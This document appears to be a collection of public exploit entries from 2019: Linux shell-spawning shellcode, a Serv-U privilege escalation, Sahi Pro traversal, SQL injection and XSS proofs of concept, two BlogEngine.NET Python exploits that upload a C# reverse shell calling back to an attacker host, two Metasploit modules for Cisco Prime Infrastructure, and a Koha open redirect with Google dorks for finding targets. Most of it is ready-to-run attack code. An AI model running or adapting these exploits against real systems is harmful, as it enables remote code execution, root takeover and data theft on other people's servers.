;Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  22 bytes
;github = https://github.com/STARRBOY  


============ASM===========================
global _start

section .text

_start:



  ;int execve(const char *filename, char *const argv[],char *const envp[])
  xor   rsi,  rsi      ;clear rsi
  push  rsi        ;push null on the stack
  mov   rdi,  0x68732f2f6e69622f   ;/bin//sh in reverse order
  push  rdi
  push  rsp    
  pop  rdi        ;stack pointer to /bin//sh
  mov   al,  59      ;sys_execve
  cdq          ;sign extend of eax
  syscall

=======Generate Shellcode==========================================
nasm -felf64 spawn_shell.nasm -o spawn_shell.o 
ld spawn_shell.o -o spawn_shell


=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack shell.c -o shell

#include <stdio.h>
#include <string.h>

unsigned char code[]= \
"\x48\x31\xf6\x56\x48\xbf"
"\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68\x57\x54"
"\x5f\xb0\x3b\x99\x0f\x05";
int main(){

        printf("length of your shellcode is: %d\n", (int)strlen(code));

        int (*ret)() = (int(*)())code;

        ret();
}

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{       
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}

# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20470


Description :

An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.

POC :

vulnerable URL :

''' replace the ip and port of the remote sahi pro server machine '''


http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected

# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection.
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20469
# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/

Description :

An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.


POC :

vulnerable URL :

''' replace the ip and port of the remote sahi pro server machine '''


# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page.

http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS

# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20472
# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/

DESCRIPTION :

An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS.


POC :

step 1 :

 create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) :

            var $tc1 = _testcase(“TC-1″,”<script>alert(document.cookie)</script>”).start();

           _log(“testing stored XSS injection”);

            $tc1.end();

Step 2 :

Execute the created script ( poc.sah ) using sahi GUI controller .

Step 3 : navigate to the web logs console ( http://<ip>:<port>/logs ) using the browser for the executed script. XSS is triggered 

BlogEngine.NET, versions 3.3.7 and earlier, is vulnerable to two separate
Directory Traversal issues that can lead to Remote Code Execution.

CVE-2019-10719 exploits a directory traversal in /api/upload, allowing
users to write files to any location within the web root.  This bypasses
the protection added in version 3.3.7 to prevent CVE-2019-6714.  A user,
with the ability to add images or files to posts, can upload a malicious
PostView.ascx file to the Themes folder.  The code could then be triggered
by setting the theme parameter to the newly create folder.

CVE-2019-10720 exploits a directory traversal in the theme cookie to
trigger a remote code execution.  A user, with the ability to add images or
files to posts, can upload a malicious PostView.ascx file, then trigger the
RCE by setting the theme cookie to ../../App_Data/files.

Disclosure at:
https://www.securitymetrics.com/blog/BlogEngineNET-Directory-Traversal-Remote-Code-Execution-CVE-2019-10719-CVE-2019-10720

# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10719

#1. Description
#==============

#BlogEngine.NET is vulnerable to an Directory Traversal on `/api/upload` which allows a RCE through the `theme` parameter.

#2. Proof of Concept
#=============

#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`; exploit the directory traversal to upload the shell into the **/Custom/Themes** #directory:

#~~~
#POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085

#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"

#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>

#<script runat="server">
#static System.IO.StreamWriter streamWriter;

#    protected override void OnLoad(EventArgs e) {
#        base.OnLoad(e);

#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#using(System.IO.Stream stream = client.GetStream()) {
#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#streamWriter = new System.IO.StreamWriter(stream);

#StringBuilder strInput = new StringBuilder();

#System.Diagnostics.Process p = new System.Diagnostics.Process();
#p.StartInfo.FileName = "cmd.exe";
#p.StartInfo.CreateNoWindow = true;
#p.StartInfo.UseShellExecute = false;
#p.StartInfo.RedirectStandardOutput = true;
#p.StartInfo.RedirectStandardInput = true;
#p.StartInfo.RedirectStandardError = true;
#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#p.Start();
#p.BeginOutputReadLine();

#while(true) {
#strInput.Append(rdr.ReadLine());
#p.StandardInput.WriteLine(strInput);
#strInput.Remove(0, strInput.Length);
#    } } } } }

#    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
#  StringBuilder strOutput = new StringBuilder();

#        if (!String.IsNullOrEmpty(outLine.Data)) {
#        try {
#                strOutput.Append(outLine.Data);
#                    streamWriter.WriteLine(strOutput);
#                    streamWriter.Flush();
#} catch (Exception err) { }
#       }
#    }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

#-----------------------------12143974373743678091868871063--
#~~~

#The RCE can be triggered by setting the **theme** parameter to **RCE_TEST**: $RHOST/?theme=RCE_Test

#==============================

import argparse
import io
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10719

CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Upload and trigger a reverse shell

python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337

Open a listener to capture the reverse shell - Metasploit or netcat

nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

"""

urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
       }


def make_request(session, method, target, params={}, data={}, files={}):
    proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
              }
    if method == 'GET':
        r = requests.Request(method, target, params=params)
    elif method == 'POST':
        if files:
            r = requests.Request(method, target, files=files)
        else:
            r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text

def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host+urls.get('login'))
    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
    login_data = dict([(i[0],i[2]) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)

def upload_shell(session, target, shell_dir, listener):
    try:
        lhost, lport = listener.split(':')
    except:
       print(target, " is not in the correct HOST:PORT format")
       sys.exit(1)

    shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
  static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

  using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
    using(System.IO.Stream stream = client.GetStream()) {
      using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
        streamWriter = new System.IO.StreamWriter(stream);

        StringBuilder strInput = new StringBuilder();

        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardError = true;
        p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
        p.Start();
        p.BeginOutputReadLine();

        while(true) {
          strInput.Append(rdr.ReadLine());
          p.StandardInput.WriteLine(strInput);
          strInput.Remove(0, strInput.Length);
        }
      }
    }
      }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
     StringBuilder strOutput = new StringBuilder();

         if (!String.IsNullOrEmpty(outLine.Data)) {
           try {
                  strOutput.Append(outLine.Data);
                      streamWriter.WriteLine(strOutput);
                      streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
    make_request(session, "POST", target + "/api/upload?action=filemgr&dirPath=~/App_Data/files/../../Custom/Themes/" + shell_dir, files={"file": ("PostView.ascx".format(shell_dir=shell_dir), shell, "application/octet-stream")})

def trigger_shell(session, target, shell_dir):
    make_request(session, "GET", target + "/", params={"theme": shell_dir})

def main(target, user, passwd, shell_dir, listener):
    with requests.Session() as session:
        login(session, target, user, passwd)
        upload_shell(session, target, shell_dir, listener)
        trigger_shell(session, target, shell_dir)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10719 Path traversal + RCE')
    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
    parser.add_argument('-d', '--dir', nargs='?', default="RCE", help='Theme Directory to write Reverse shell too')
    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
    parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
    args = parser.parse_args()

    protocol = "https://" if args.ssl else "http://"
    main(protocol + args.target, args.user, args.passwd, args.dir, args.listener)

# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10720

#1. Description
#==============

#BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE.

#2. Proof of Concept
#=============

#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`:

#~~~
#POST /api/upload?action=filemgr HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085

#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"

#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>

#<script runat="server">
#static System.IO.StreamWriter streamWriter;

#    protected override void OnLoad(EventArgs e) {
#        base.OnLoad(e);

#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#using(System.IO.Stream stream = client.GetStream()) {
#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#streamWriter = new System.IO.StreamWriter(stream);

#StringBuilder strInput = new StringBuilder();

#System.Diagnostics.Process p = new System.Diagnostics.Process();
#p.StartInfo.FileName = "cmd.exe";
#p.StartInfo.CreateNoWindow = true;
#p.StartInfo.UseShellExecute = false;
#p.StartInfo.RedirectStandardOutput = true;
#p.StartInfo.RedirectStandardInput = true;
#p.StartInfo.RedirectStandardError = true;
#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#p.Start();
#p.BeginOutputReadLine();

#while(true) {
#strInput.Append(rdr.ReadLine());
#p.StandardInput.WriteLine(strInput);
#strInput.Remove(0, strInput.Length);
#    } } } } }

#    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
#  StringBuilder strOutput = new StringBuilder();

#        if (!String.IsNullOrEmpty(outLine.Data)) {
#        try {
#                strOutput.Append(outLine.Data);
#                    streamWriter.WriteLine(strOutput);
#                    streamWriter.Flush();
#} catch (Exception err) { }
#        }
#    }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

#-----------------------------12143974373743678091868871063--
#~~~

#Trigger the RCE by setting the **theme** cookie to **../../App_Data/files/2019/06/** and browsing to any page on the application; authentication is not required to trigger the RCE.
=================================

import argparse
import io
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10719

CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Upload and trigger a reverse shell

python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337

Open a listener to capture the reverse shell - Metasploit or netcat

nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

"""

urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
       }


def make_request(session, method, target, params={}, data={}, files={}):
    proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
              }
    if method == 'GET':
        r = requests.Request(method, target, params=params)
    elif method == 'POST':
        if files:
            r = requests.Request(method, target, files=files)
        else:
            r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text

def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host+urls.get('login'))
    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
    login_data = dict([(i[0],i[2]) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)

def upload_shell(session, target, listener):
    try:
        lhost, lport = listener.split(':')
    except:
       print(target, " is not in the correct HOST:PORT format")
       sys.exit(1)

    shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
  static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

  using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
    using(System.IO.Stream stream = client.GetStream()) {
      using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
        streamWriter = new System.IO.StreamWriter(stream);

        StringBuilder strInput = new StringBuilder();

        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardError = true;
        p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
        p.Start();
        p.BeginOutputReadLine();

        while(true) {
          strInput.Append(rdr.ReadLine());
          p.StandardInput.WriteLine(strInput);
          strInput.Remove(0, strInput.Length);
        }
      }
    }
      }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
     StringBuilder strOutput = new StringBuilder();

         if (!String.IsNullOrEmpty(outLine.Data)) {
           try {
                  strOutput.Append(outLine.Data);
                      streamWriter.WriteLine(strOutput);
                      streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
    make_request(session, "POST", target + "/api/upload?action=filemgr", files={"file": ("PostView.ascx", shell, "application/octet-stream")})

def trigger_shell(session, target):
    import datetime
    now = datetime.datetime.now().strftime("%Y/%m/")
    requests.get(target + "/", cookies={"theme": "../../App_Data/files/{}".format(now)})

def main(target, user, passwd, listener):
    with requests.Session() as session:
        login(session, target, user, passwd)
        upload_shell(session, target, listener)
        trigger_shell(session, target)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE')
    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
    parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
    args = parser.parse_args()

    protocol = "https://" if args.ssl else "http://"
    main(protocol + args.target, args.user, args.passwd, args.listener)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super( update_info( info,
'Name'           => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
'Description'    => %q{
        This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The
        runrshell binary is meant to execute a shell script as root, but can be abused to inject
        extra commands in the argument, allowing you to execute anything as root.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
'sinn3r'                               # Metasploit module
        ],
'Platform'       => ['linux'],
'Arch'           => [ARCH_X86, ARCH_X64],
'SessionTypes'   => ['shell', 'meterpreter'],
'DisclosureDate' => '2018-12-08',
'Privileged'     => true,
'References'     =>
        [
          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
        ],
'Targets'        =>
        [
          [ 'Cisco Prime Infrastructure 3.4.0', {} ]
        ],
'DefaultTarget'  => 0
     ))

    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
    ]
  end

  def exec_as_root(cmd)
    command_string = "/opt/CSCOlumos/bin/runrshell '\"&& #{cmd} #'"
    vprint_status(cmd_exec(command_string))
  end

  def exploit
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
    exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)
    print_status("Uploading #{exe_path}")
    write_file(exe_path, generate_payload_exe)
    unless file?(exe_path)
      print_error("Failed to upload #{exe_path}")
      return
    end

    register_file_for_cleanup(exe_path)
    print_status('chmod the file with +x')
    exec_as_root("/bin/chmod +x #{exe_path}")
    print_status("Executing #{exe_path}")
    exec_as_root(exe_path)
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
'Name'           => 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability',
'Description'    => %q{
        This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that
        the TarArchive Java class the HA Health Monitor component uses does not check for any
        directory traversals while unpacking a Tar file, which can be abused by a remote user to
        leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps
        directory, and gain arbitrary remote code execution. Note that authentication is not
        required to exploit this vulnerability.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Steven Seeley', # Original discovery, PoC
'sinn3r'         # Metasploit module
        ],
'Platform'       => 'linux',
'Arch'           => ARCH_X86,
'Targets'        =>
        [
          [ 'Cisco Prime Infrastructure 3.4.0.0', { } ]
        ],
'References'     =>
        [
          ['CVE', '2019-1821'],
          ['URL', 'https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html'],
          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce'],
          ['URL', 'https://srcincite.io/advisories/src-2019-0034/'],
          ['URL', 'https://srcincite.io/pocs/src-2019-0034.py.txt']
        ],
'DefaultOptions' =>
        {
'RPORT' => 8082,
'SSL'   => true,

        },
'Notes'          =>
        {
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability'   => [ CRASH_SAFE ]
        },
'Privileged'     => false,
'DisclosureDate' => 'May 15 2019',
'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('WEBPORT', [true, 'Cisco Prime Infrastructure web interface', 443]),
        OptString.new('TARGETURI', [true, 'The route for Cisco Prime Infrastructure web interface', '/'])
      ])
  end

  class CPITarArchive
    attr_reader :data
    attr_reader :jsp_name
    attr_reader :tar_name
    attr_reader :stager
    attr_reader :length

    def initialize(name, stager)
      @jsp_name = "#{name}.jsp"
      @tar_name = "#{name}.tar"
      @stager = stager
      @data = make
      @length = data.length
    end

    def make
      data = ''
      path = "../../opt/CSCOlumos/tomcat/webapps/ROOT/#{jsp_name}"
      tar = StringIO.new
      Rex::Tar::Writer.new(tar) do |t|
        t.add_file(path, 0644) do |f|
          f.write(stager)
        end
      end
      tar.seek(0)
      data = tar.read
      tar.close
      data
    end
  end

  def check
    res = send_request_cgi({
'rport'  => datastore['WEBPORT'],
'SSL'    => true,
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'webacs', 'pages', 'common', 'login.jsp')
    })

    unless res
      vprint_error('No response from the server')
      return CheckCode::Unknown
    end

    if res.code == 200 && res.headers['Server'] && res.headers['Server'] == 'Prime'
      return CheckCode::Detected
    end

    CheckCode::Safe
  end

  def get_jsp_stager(out_file, bin_data)
    # For some reason, some of the bytes tend to get lost at the end.
    # Not really sure why, but some extra bytes are added to ensure the integrity
    # of the code. This file will get deleted during cleanup anyway.
    %Q|<%@ page import="java.io.*" %>
<%
      String data = "#{Rex::Text.to_hex(bin_data, '')}";
      FileOutputStream outputstream = new FileOutputStream("#{out_file}");
      int numbytes = data.length();
      byte[] bytes = new byte[numbytes/2];
      for (int counter = 0; counter < numbytes; counter += 2)
      {
        char char1 = (char) data.charAt(counter);
        char char2 = (char) data.charAt(counter + 1);
        int comb = Character.digit(char1, 16) & 0xff;
        comb <<= 4;
        comb += Character.digit(char2, 16) & 0xff;
        bytes[counter/2] = (byte)comb;
      }
      outputstream.write(bytes);
      outputstream.close();
      try {
        Runtime.getRuntime().exec("chmod +x #{out_file}");
        Runtime.getRuntime().exec("#{out_file}");
      } catch (IOException exp) {}
    %>#{Rex::Text.rand_text_alpha(30)}|
  end

  def make_tar
    elf_name = "/tmp/#{Rex::Text.rand_text_alpha(10)}.bin"
    register_file_for_cleanup(elf_name)
    elf = generate_payload_exe(code: payload.encoded)
    jsp_stager = get_jsp_stager(elf_name, elf)
    tar_name = Rex::Text.rand_text_alpha(10)
    register_file_for_cleanup("apache-tomcat-8.5.16/webapps/ROOT/#{tar_name}.jsp")
    CPITarArchive.new(tar_name, jsp_stager)
  end

  def execute_payload(tar)
    # Once executed, we are at:
    # /opt/CSCOlumos
    send_request_cgi({
'rport'  => datastore['WEBPORT'],
'SSL'    => true,
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, tar.jsp_name)
    })
  end

  def upload_tar(tar)
    post_data = Rex::MIME::Message.new
    post_data.add_part(tar.data, nil, nil, "form-data; name=\"files\"; filename=\"#{tar.tar_name}\"")

    # The file gets uploaded to this path on the server:
    # /opt/CSCOlumos/apache-tomcat-8.5.16/webapps/ROOT/tar_name.jsp
    res = send_request_cgi({
'method' => 'POST',
'uri'    => normalize_uri(target_uri.path, 'servlet', 'UploadServlet'),
'data'   => post_data.to_s,
'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
        {
'Destination-Dir' => 'tftpRoot',
'Compressed-Archive' => 'false',
'Primary-IP' => '127.0.0.1',
'Filecount' => '1',
'Filename' => tar.tar_name,
'FileSize' => tar.length
        }
    })

    (res && res.code == 200)
  end

  def exploit
    tar = make_tar
    print_status("Uploading tar file (#{tar.length} bytes)")
    if upload_tar(tar)
      print_status('Executing JSP stager...')
      execute_payload(tar)
    else
      print_status("Failed to upload #{tar.tar_name}")
    end
  end
end

####################################################################

# Exploit Title : Koha Library Software 18.1106000 Tracklinks Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/06/2019
# Vendor Homepage : koha.org - koha-community.org
Software Download Link : 
download.koha-community.org
download.koha-community.org/old_releases/
Software Affected Versions : 
Koha 18.1106000
Koha 18.1105000
Koha 18.1104000
Koha 18.1101000
Koha 18.0508000
Koha 18.0510000
Koha 18.0507000
Koha 17.0506000
Koha 17.0505000
Koha 17.1105000
Koha 17.1103000
Koha 16.1114000
Koha 16.0504000
Koha 3.2208000
Koha 3.2204000
Koha 3.1408000
Koha 3.1411000
Koha 3.2210000
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : 
inurl:"/cgi-bin/koha/opac-user.pl" site:edu
inurl:"/cgi-bin/koha/opac-user.pl" site:gov
inurl:"/cgi-bin/koha/opac-user.pl" site:int
inurl:"/cgi-bin/koha/opac-user.pl"
inurl:"/cgi-bin/koha/opac-main.pl"
inurl:/cgi-bin/koha/opac-shelves.pl
intext:Powered By Koha
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
****************************
Koha Library Software - The world's first free and open source library system
Koha is a fully featured, scalable library management system. 
Development is sponsored by libraries of varying types and sizes, volunteers, and 
support companies worldwide.

####################################################################

# Impact :
***********
Koha Library Software accepts a user-controlled input that specifies
a link to an external site, and uses that link in a Redirect. This simplifies phishing 
attacks. An http parameter may contain a URL value and could cause the web 
application to redirect the request to the specified URL. By modifying the URL 
value to a malicious site, an attacker may successfully launch a phishing scam and 
steal user credentials. Because the server name in the modified link is identical to the 
original site, phishing attempts have a more trustworthy appearance. Open redirect is a 
failure in that process that makes it possible for attackers to steer users to malicious 
websites. This vulnerability is used in phishing attacks to get users to visit malicious 
sites without realizing it. Web users often encounter redirection when they visit the 
Web site of a company whose name has been changed or which has been acquired by 
another company. Visiting unreal web page user's computer becomes affected 
by malware the task of which is to deceive the valid actor and steal his personal data.

####################################################################

# Vulnerable File :
*****************
/tracklinks.pl

# Vulnerable Parameters :
***********************
?uri=//

?biblionumber=[ID-NUMBER]&uri=//

# Open Redirection Exploit :
**************************
/cgi-bin/koha/tracklinks.pl?uri=//[REDIRECT-ADDRESS-HERE].gov

